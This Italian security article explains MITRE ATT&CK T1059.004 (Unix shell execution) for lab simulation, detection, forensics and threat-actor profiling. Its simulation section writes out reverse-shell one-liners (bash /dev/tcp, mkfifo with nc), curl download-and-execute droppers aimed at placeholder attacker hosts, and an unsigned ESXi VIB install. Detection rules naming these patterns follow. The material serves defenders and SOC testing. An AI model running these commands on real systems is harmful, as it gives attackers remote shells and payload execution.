Esecuzione via Shell Unix: Unix Shell (T1059.004)

Per simulare questa tecnica in laboratorio servono scenari che riproducano i pattern reali osservati in campagna. L'obiettivo non è semplicemente aprire una shell, ma concatenare azioni che un SOC dovrebbe intercettare: download, esecuzione, persistenza e comunicazione C2.

Il primo scenario classico è la reverse shell. In un ambiente controllato, sull'host attaccante si mette in ascolto Netcat (open source) con:

nc -lvnp 4444

Sul target Linux si genera la connessione inversa con:

bash -i >& /dev/tcp/<IP-ATTACCANTE>/4444 0>&1

Questo pattern replica il comportamento documentato per malware come BPFDoor, SnappyTCP e Chaos, che creano reverse shell su porte specifiche. Per varianti più evasive, si può usare la tecnica del pipe tramite mkfifo, che evita la sintassi /dev/tcp non disponibile su tutte le distribuzioni:

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <IP-ATTACCANTE> 4444 > /tmp/f

Il secondo scenario riguarda l'esecuzione tramite script dropper, coerente con quanto osservato nella campagna KV Botnet Activity (C0035) dove script bash gestivano le fasi di installazione del botnet. Si crea uno script che simula il download e l'esecuzione in catena:

curl -fsL <URL-PAYLOAD-LAB> -o /tmp/.cache_update && chmod +x /tmp/.cache_update && /tmp/.cache_update

Per il contesto ESXi, si può simulare l'installazione di VIB malevoli come documentato per UNC3886, usando la sintassi legittima dell'hypervisor in un lab isolato:

esxcli software vib install -v /tmp/payload.vib --no-sig-check

Il flag --no-sig-check è il segnale d'allarme che la mitigazione execInstalledOnly è progettata per bloccare.

Su macOS, il pattern di Contagious Interview si replica con un bash downloader minimale che scarica ed esegue un secondo stadio, sfruttando la capacità nativa di curl e bash:

sh -c "curl -s <URL-STAGE2-LAB> | bash"

Per l'automazione completa in esercizi red team, Sliver (open source) e Mythic (open source) offrono agent nativi per Linux e macOS con generazione automatica di reverse shell bash. Caldera (open source) permette di orchestrare catene di comandi shell mappate direttamente sulle tecniche ATT&CK, facilitando la validazione dei controlli SOC.

Il problema centrale della detection su T1059.004 è il rapporto segnale/rumore: la shell è lo strumento più usato anche dagli amministratori legittimi. La chiave è il contesto comportamentale, non la presenza della shell in sé.

Le log source fondamentali sono auditd su Linux, i Unified Log su macOS, e i log vmkernel/auth su ESXi. Su dispositivi di rete, il syslog dell'appliance e i flussi di rete catturati da un NSM completano il quadro.

La prima regola di detection riguarda le relazioni parent-child anomale. Una shell bash invocata da apache2, nginx, curl, mail o da un processo Java di un'applicazione web è quasi certamente malevola. Su auditd, la configurazione per catturare le execve della famiglia shell è:

-a always,exit -F arch=b64 -S execve -F path=/bin/bash -k shell_exec

Questa regola va replicata per /bin/sh, /bin/zsh e /bin/busybox. Il campo chiave nel log risultante è ppid (parent process ID), che rivela chi ha invocato la shell.

Il secondo pilastro è il pattern matching sulla command line. Le analisi AN1081 e AN1083 indicano chiaramente i segnali: uso di pipe verso bash (| bash, | sh), concatenamento con &&, comandi di download (curl, wget), e pattern di reverse shell (/dev/tcp, mkfifo, nc -e). Una query in osquery (open source) efficace per questo:

SELECT pid, cmdline, parent FROM processes WHERE name IN ('bash','sh','zsh') AND (cmdline LIKE '%/dev/tcp%' OR cmdline LIKE '%mkfifo%' OR cmdline LIKE '%nc -e%');

Il terzo elemento è il contesto utente e temporale. Shell eseguite da account di servizio che normalmente non aprono sessioni interattive, o attività root fuori dalle finestre di manutenzione, meritano alert ad alta priorità. Su ESXi questo è particolarmente efficace perché le sessioni SSH amministrative seguono pattern prevedibili.

Per macOS (analisi AN1082), il focus si sposta sulla provenienza: shell spawn da applicazioni come Preview, Safari o da LaunchAgent in path sospetti (/Users/Shared, /tmp, ~/Library/LaunchAgents) indicano probabile compromissione. I Unified Log di macOS catturano questi eventi con il subsystem com.apple.execpolicy.

La gestione dei falsi positivi richiede una whitelist basata su triple: (utente, parent process, pattern di comando). Gli script cron legittimi, i job Ansible e le pipeline CI/CD generano invocazioni shell massive ma prevedibili. Strumenti come Wazuh (open source) o Elastic Security (freemium) permettono di costruire eccezioni granulari senza degradare la copertura.

Per i network device (AN1084), la detection si basa sul syslog dell'appliance e sul monitoraggio degli accessi SSH da IP non in whitelist, con attenzione a comandi privilegiati come enable, tftp o modifiche firmware.

L'analisi forense di un'intrusione basata su shell Unix si costruisce stratificando artefatti di diversa granularità. Il punto di partenza è sempre la storia dei comandi: i file .bash_history, .zsh_history e .sh_history nella home directory di ogni utente — incluso root — conservano i comandi eseguiti in sessioni interattive. Attenzione: gli attaccanti sofisticati eseguono unset HISTFILE o export HISTSIZE=0 come primo comando, ma questa azione stessa può lasciare tracce nei log di auditd se la syscall execve è monitorata.

I log di auditd rappresentano la fonte più ricca su Linux. Ogni evento SYSCALL con syscall execve registra il binario eseguito, gli argomenti, l'utente, il timestamp e il processo padre. La correlazione tra eventi SYSCALL consecutivi ricostruisce l'intera catena di esecuzione. Per estrarre le invocazioni shell da un archivio audit:

ausearch -sc execve -i | grep -E '/bin/(ba)?sh|/bin/zsh|busybox'

Su macOS, gli artefatti critici includono i database di quarantena (com.apple.LaunchServices.QuarantineEventsV2) che tracciano i file scaricati, e i plist dei LaunchAgent/LaunchDaemon che rivelano meccanismi di persistenza tramite script shell. Il Unified Log conserva eventi di esecuzione policy con dettagli su path e firma del codice — particolarmente utile per identificare script non firmati eseguiti da contesti inattesi come Automator o AppleScript.

Per ambienti ESXi, i log vmkernel.log e auth.log registrano le sessioni SSH e i comandi eseguiti tramite DCUI. L'analisi della campagna RedPenguin (C0056) mostra come UNC3886 abbia usato shell interattive su router Juniper MX, lasciando tracce nei log di autenticazione dell'appliance. In modo simile, nella campagna FLORAHOX Activity (C0053), script bash controller hanno lasciato artefatti nei filesystem di router compromessi.

Gli artefatti del filesystem completano il quadro. Script malevoli spesso risiedono in /tmp, /dev/shm, /var/tmp o directory nascoste con prefisso punto. I timestamp MACB (Modified, Accessed, Changed, Birth) di questi file, estratti con tool come Sleuth Kit (open source) via fls e mactime, permettono di posizionare l'esecuzione nella timeline. Named pipe create con mkfifo in /tmp sono indicatori specifici di reverse shell.

Per la correlazione temporale, i log di rete dell'appliance — specialmente per la campagna KV Botnet Activity (C0035) che ha colpito router SOHO — vanno incrociati con i log di autenticazione per identificare la sessione SSH iniziale che ha avviato la catena di esecuzione.

Il panorama degli attori che sfruttano T1059.004 si distribuisce lungo due assi principali: gruppi state-sponsored cinesi focalizzati su infrastrutture critiche e dispositivi di rete, e attori orientati al profitto che abusano di ambienti cloud e container.

Volt Typhoon (G1017) rappresenta il paradigma dell'attore che vive della terra sfruttando shell su dispositivi di rete. Il suo tool Brightmetricagent.exe include una libreria CLI capace di invocare zsh, mentre la campagna KV Botnet Activity (C0035) ha dimostrato l'uso sistematico di script bash per l'installazione e il controllo di botnet su router SOHO Cisco, NETGEAR e DrayTek a fine vita. La campagna Quad7 Activity (C0055), che ha fornito infrastruttura di password-spraying a più attori cinesi, conferma il pattern: shell /bin/sh su router TP-Link e Asus compromessi come nodi di una rete proxy distribuita.

UNC3886 (G1048) si distingue per la specializzazione su hypervisor e appliance di rete. L'uso di script bash per installare VIB malevoli su ESXi, combinato con le operazioni documentate nella campagna RedPenguin (C0056) su router Juniper MX con backdoor TINYSHELL, configura un profilo operativo focalizzato sulla persistenza profonda in infrastrutture virtualizzate. Il malware CASTLETAP che sfrutta BusyBox e VIRTUALPITA con capacità di spawn bash rafforzano questo profilo.

APT41 (G0096) utilizza la shell Unix nella fase di ricognizione pre-exploit, con comandi di survey su sistemi Linux prima dello sfruttamento di vulnerabilità specifiche come CVE-2019-19871. Questo approccio metodico — enumerazione via shell, poi exploit mirato — è caratteristico di attori con capacità sia di spionaggio che di operazioni finanziarie. Il tool Derusbi, con la sua capacità di creare shell bash remote, supporta operazioni persistenti e di lungo periodo.

Sul versante cybercrime, TeamTNT (G0139) e Rocke (G0106) condividono il focus su mining di criptovalute tramite script shell in ambienti cloud e container. Kinsing, Hildegard e Skidmap — tutti associati a questo ecosistema — usano catene di shell script per propagazione, persistenza e deployment dei miner.

Contagious Interview (G1052) aggiunge una dimensione di social engineering: il targeting di sviluppatori macOS tramite finti colloqui di lavoro, con bash downloader (coremedia.sh, cloud.sh) come vettori di compromissione iniziale.

Il trend emergente è chiaro: la shell Unix come vettore si sta spostando dai server tradizionali verso dispositivi di rete, appliance di sicurezza e hypervisor — ambienti dove il monitoraggio è storicamente debole e la persistenza può sopravvivere ai riavvii. La convergenza tra Volt Typhoon, UNC3886 e le operazioni FLORAHOX indica una strategia coordinata di prepositioning su infrastrutture critiche occidentali.

Framework MITRE ATT&CK v16 — T1059.004 (Unix Shell), TA0002 (Execution). Campagne: C0048 (Operation MidnightEclipse), C0053 (FLORAHOX Activity), C0056 (RedPenguin), C0035 (KV Botnet Activity), C0055 (Quad7 Activity). Mitigazione M1038 (Execution Prevention). Detection: auditd, osquery, Unified Log macOS. Integrato con conoscenza professionale per tool e procedure operative.